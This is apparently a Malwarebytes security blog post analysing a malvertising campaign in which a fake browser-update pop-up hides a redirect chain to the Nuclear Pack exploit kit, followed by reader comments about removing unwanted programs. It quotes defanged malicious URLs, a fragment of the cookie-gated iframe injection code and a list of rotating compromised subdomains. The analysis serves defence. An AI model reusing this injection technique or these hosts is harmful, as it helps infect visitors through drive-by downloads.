Categories

Malvertising

A cunning way to deliver malware

Potentially unwanted programs, also known as PUPs, continue to be a real nuisance. A recent blog post by Will Dormann on CERT.org shows the prevalence of such applications lurking on every corner of the web: search engines results, software portals, popups, ads, etc.

Deceptive tactics

Here is an example of an unwanted warning pushed as a pop-up:

message

The text reads: “UPDATED RECOMMENDED! It is recommended that you install the software to ensure your browser is the latest version. Please update to continue.

The following page shows that our browser (Internet Explorer) may be out of date and urges us to download a program to check for outdated software.

download

It is worth noting that this webpage was totally unsolicited and is in fact very misleading. The disclaimer hiding at the bottom of the page reveals more about what this is all about:

UpdateNowPro.com is distributing Software Updater. Air Installer is an install manager that will manage the installation of the selected software. In addition to managing the installation of your selected software, this install manager will make recommendations for additional free software that you may be interested in. Additional software may include toolbars, browser add-ons, game applications, anti-virus applications and other types of applications. You are not required to install any additional software to receive your selected software. You can completely remove the program at any time in Windows ‘Add/Remove Programs’. At the time of downloading you accept the Terms and Privacy Policy.

In other words, the program they want you to download bundles other applications, something we know all too well.

Attempting to close the page brings up yet another warning:

sure

We could argue with advertisers that these practices are not okay until we are blue in the face. But here’s the catch with this one: while the page is saying our system could be at risk we are silently being infected with a drive-by download!

From PUP to exploit kit

The following Fiddler (web debugger) capture was recorded on: 2014-06-30 18:30 PT. It shows how bad guys leverage large infrastructures to hide malicious redirections behind potentially unwanted programs.

2014-06-30-18-30-51

hxxp://rvzr-a.akamaihd.net/sd/apps/fusionx/0.0.4.html?aff=1700-1043
hxxp://www.likemagicbox.com/fusionx/www/delivery/afr.php?zoneid=486&cb=6065978317
hxxp://classic.flowershopprescott.com/assets/js/jquery-1.3.1.min.js?ver=1.27.8660
hxxp://draft.traveltube.biz/d36c829bovoym7.html

Some users are getting redirected to an exploit kit while at the same time receiving the same software update page. This is a very sneaky attack involving many actors with rotating domain names for harder identification (click to enlarge):

chain2

The domain likemagicbox.com illustrated in this case was registered on 2014-06-30, the same day it started being used in this malware campaign: this is no simple coincidence!

Traffic analysis

The first URL on akamaihd.net has an external JavaScript inclusion:

1

The JavaScript contains a convoluted variable that has various identifiers corresponding to the type of ad and the geolocation of the visitor. More importantly, we see the iFrame redirecting to an abused/complicit server:

2

Once on this URL there are a couple different ad redirections (note the Yahoo advert too!). And there is this interesting code snippet:

if(document.cookie.indexOf("_epel")==-1){var page_object=document.createElement("iframe");

This checks the user’s computer for a cookie called _epel and only if it does not exist will it allow the creation of a secondary (malicious) iframe. To prevent the same user from getting redirected to it again, another little piece of code creates the aforementioned cookie before exiting:

document.cookie = "_epel=readed;

3

This dynamically created iframe is rotated every hour using a simple sub-domain generation algorithm (DGA) with alphabetically sorted keywords:

URL,Date,Registrant
co.TOASTEDROOSTERCAFE.COM,Thu Jul 3 13:04,Robert Maynard
coa.TOASTEDROOSTERCAFE.NET,Thu Jul 3 14:03,Robert Maynard
coas.TOASTGUYS.COM,Thu Jul 3 15:04,Robert Maynard
coach.TOASTHOUSE.COM,Thu Jul 3 16:06,?
coaches.TOASTHOUSEMARKET.COM,Thu Jul 3 17:02,Robert Maynard
coaching.TOASTKITCHEN.COM,Thu Jul 3 18:17,Robert Maynard
coal.TOASTMARKET.COM,Thu Jul 3 19:22,Robert Maynard
coals.TSTKITCHEN.COM,Thu Jul 3 20:12,?
coast.2NDAMENDMENTVOTERS.COM,Thu Jul 3 21:07,?
coastal.2NDAMENDMENTVOTERS.ORG,Thu Jul 3 22:02,?
coat.AIMINSINC.INFO,Thu Jul 3 23:07,Kurt Grashaw
coating.AMERICANBROTHERSINARM.COM,Fri Jul 4 00:07,Kurt Grashaw
coatings.ANALEHSHOW.COM,Fri Jul 4 01:12,Kurt Grashaw
cobra.CCNAXUSCONSTRUCTION.COM,Fri Jul 4 02:02,Kurt Grashaw
coc.GRANBYSOCCER.COM,Fri Jul 4 03:12,Kurt Grashaw
cock.LOOKINGTOVOLUNTEER.ORG,Fri Jul 4 04:02,Kurt Grashaw

Many of these root domains belong to the same persons, as if the bad guys were enumerating compromised accounts.

Malicious iframes are inserted within jquery (a very popular JavaScript library) files such as:

{subdomain.domain}/assets/js/jquery-1.3.1.min.js?ver=1.27.8660

After the URL has been used for an hour, it is discarded and the subdomain no longer responds.

4b

You may have recognized the URL for the landing page of the Nuclear Pack exploit kit:

5

The page loads a Java exploit (CVE-2013-2465?):

Java

and a Flash exploit (CVE-2014-0515?):

SWF

two malware payloads are subsequently dropped (#1, #2) detected as Spyware.Zbot.VXGen by Malwarebytes Anti-Malware.

Parting thoughts

Earlier recorded events with a similar redirection method date back to May 2014 as documented in this security blog.

Malwarebytes is tough on PUPs and we show no mercy for exploits or malware.

We have reported this incident to Akamai’s Abuse department so that they can take immediate action against these bad actors.

@jeromesegura


  • https://www.facebook.com/sawtoothpaper Brandon Anderson

    I just wanted to thank you guys regarding PUPs. When it comes to Malware if you include Adware and Spyware nobody was paying extra attention to PUPs. I have Avast, I had to turn up the PUP sensitivity which is set to medium on default and does a mediocre job.

    I also have Malwarebytes Premium which I got in 2008. Malwarebytes is my go to tool for PUPs. I love the strict guidelines and you’re the only one on the market I know that is.

    When I give PC advice, I tell people to try to Malwarebytes for cleaning up. The PUP problem is a bigger and more common problem. When PUPs pile up it becomes a performance problem. So I recommend Avast and Malwarebytes as they work together great.

    While in school I did a power point presentation on PUPs. I was actually quite frustrated how bad it was and nobody treated it like Malware. In my lab I created a couple virtual machines and infested them with everything I could. I used Virus Total to go find my Malware along with my “Potentially Unwanted Programs”. I used trial versions of different anti-viruses and analyzed detection and cleanup. Malwarebytes nailed 100% of PUPs and did a better cleanup job.

    I always check my dialogue screens when installing software. You’d be surprised how many install crap without giving you option/telling you. Thanks guys :)

  • Jérôme Segura

    Hi Brandon Anderson,

    Thanks for the comment. We appreciate your loyalty and are glad you share the same vision regarding PUPs.

    Have a great day!

  • Peter Parker

    I’m thinking that for a Power Point Presentation that’s coming up, about doing it on Computer Viruses and Malware. Any viruses or malware that might be interseting to do or suggest? Leave a reply for me.

  • Pingback: A cunning way to deliver malware | Malwarebytes Unpacked | VComputerWorks

  • https://www.facebook.com/sawtoothpaper Brandon Anderson

    Cryptolocker and all its variants. FBI Ransomware all its similar variants.

    Zeus Trojan and all it’s variants.

  • Jérôme Segura

    These are good suggestions Brandon :)

  • Pingback: Una manera astuta para entregar el malware (ENG)

  • Pingback: A Week in Security (Jul 6 – 12) | Malwarebytes Unpacked

  • Pingback: OTR Links 07/19/2014 | doug — off the record

  • cstack

    PUPs destroyed my XP computer .

  • http://whimsicalartistry.com Trey Wallis

    I get a lot of PUPS and Malwarebytes Free identifies them and cleans them from my computer. Thanks.

  • Andyman77

    Doing a presentation on cryptolocker would be good. Although it may be difficult to show the infection in real time (which would be good to show) unless you are actually infected by this and it’s not something (I believe) that you can get from domain lists because of how the virus works with the c&c center. Please feel free to correct me as that’s how you learn :-) good luck with whatever you go decide to do though :-)

  • Scott Satellite

    I have a few friends who are not too computer savvy and get really thrown by this type of pop-up. Thanks for a page full of examples I can show them to help them understand what to avoid.

  • Jody Ogden

    I love Malwarebytes – this is an example of why. I tend to have all of my clients run MWB along with a traditional Anti-Virus. I started doing this about 2 years ago, and the number of “EMERGENCY” calls has dropped by over 95%! Thanks again Malwarebytes – keep up the good work. My only suggestion is creating a console for the Sysadmins who implement this across multiple enterprises – even for those who only manage 1 enterprise would benefit GREATLY!

  • Pingback: Here’s a techi view of unwanted pop up programs | Bill's Blog

  • OldTulsan

    I love Malwarebytes, but I have one problem..

    I can run Malwarebytes Free with no errors. If I run it after starting and stopping FireFox, MalwareBytes finds 22 FreeCauseTB.A errors:

    I suspect the PUP is in the Javascript file.

    Kasperky Rescue Disk 10 doesn’t find the PUP in the Javascript file either.

    I’ve deleted Firefox as a workaround, but didn’t delete personalized files.

  • OldTulsan

    Sometimes Kaspersky Rescue Disk 10 can clean up badly infected systems.

    The perps usually don’t want to trash a system, just take control of it.

  • Greg Ferris

    Will Malwarebytes find and destroy the V9 Pup,,It has taken my daughters web browser (firefox) and no matter what I try I cant kill this problem?Any ideas???

  • HawkZon

    Please recommend the safest browser.

  • Ronnie Alonso

    Why is it hard to remove PUPs? The same PUP’s are identified and removed daily. How about stopping them in the first place?

  • ComputerPCHardware

    Thanks you for this post. It’s tough staying ahead of these guys. A lof of uses don’t take this stuff seriously enough!

    Will Malwarebytes and Avast work on a PC running Norton 360?
    Norton is my main program but I want to get Malwarebytes and Avast as well.

    Thanks

  • Cindi Rose

    Thank you! You guys are awesome!!!

  • Connie Lester

    I don’t know the safest but I do know that every time I open Google Chrome, Malwarebytes finds a PUP that I have to quarantine. It’s the only time I have a problem. I use 7 different browsers.

  • Rexx Vernon Shelton

    I have two PUP that I cannot get rid of:

    PUP.Optional.Superfish.A

    The other look just like the first:

    PUP.Optional.Superfish.A

    I can, with a search, find Superfish, and then delete all that shows on the search results, and then run Malware again, and it is still on the computer. No matter what I do, I seem to be unable to get them out of my computer. I am sure that this is what is causing the uncalled for links to pop up. To my knowledge I have not given any unsolicited site to change my computer.

    Is there any help for this.

  • HawkZon

    I deleted Chrome because it’s like PUP Central.

  • Andyman77

    Maybe you could try doing a boot scan. Also a full scan with malewarebytes and adwcleaner. Failing that you may want to get someone to run combofix. Just make sure whoever runs combofix knows how to use it. :-)

  • Eldon

    I had a similar problem with the fake antivirus program. Neither Malwarebytes nor avast! could get rid of it. It creates a startup entry that doesn’t show in msconfig. But, CCleaner did show it, as well as where the offending files were. Start your PC in safe mode, delete the startup entry and the files with CCleaner. It’s worth a try.
    PS If you’re not familiar with CCleaner, it is safe and one of the most popular programs of it’s kind. Download it from the publisher Piriform.

  • HawkZon

    I recently put Norton 360 on this computer and it has prevented me from playing a little game called Snood. When I called Norton they told me I couldn’t run Malwarebytes with Norton or it would cause the computer to be open to malicious programs.
    Is there any validity in this statement?

    Because i wouldn’t uninstall Malwarebytes, they wouldn’t tell me how to configure
    360 to play my game, which can’t see the game server anymore.

Subscribe to our YouTube Channel